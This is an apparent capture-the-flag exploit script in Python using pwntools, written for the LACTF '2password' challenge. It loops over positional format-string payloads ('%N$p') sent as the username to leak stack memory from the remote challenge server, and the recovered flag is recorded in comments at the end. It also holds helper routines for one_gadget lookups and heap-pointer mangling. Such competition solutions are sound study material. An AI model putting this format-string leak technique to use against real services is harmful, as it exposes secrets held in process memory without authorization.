dplastico

2password

#!/usr/bin/env python3

from pwn import *

elf = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b main
continue
'''

def one_gadget(filename, base_addr=0):
	  return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    if args.REMOTE:
        return remote("chall.lac.tf", 31142)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])


def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================
def hex_bytes_to_ascii_little_endian(hex_bytes):
    ascii_str = bytes.fromhex(hex_bytes.decode()).decode('utf-8')
    return ascii_str[::-1]

for i in range(10):
    r = start()
    username = b"%"+bc(i+6)+b"$p"
    password = b"AAAAAAAA"
    password2 = b"BBBBBBBB"
    sla(b"username:", username)
    sla(b"password1:", password)
    sla(b"password2", password2)
    resp = rcu(b"Incorrect password for user 0x", "\n")
    log.success(hex_bytes_to_ascii_little_endian(resp))
    sleep(0.1)
    r.close()

#========= interactive ====================
#lactf{hu
#nter2_cf
#c0xz68}
#lactf{hunter2_cfc0xz68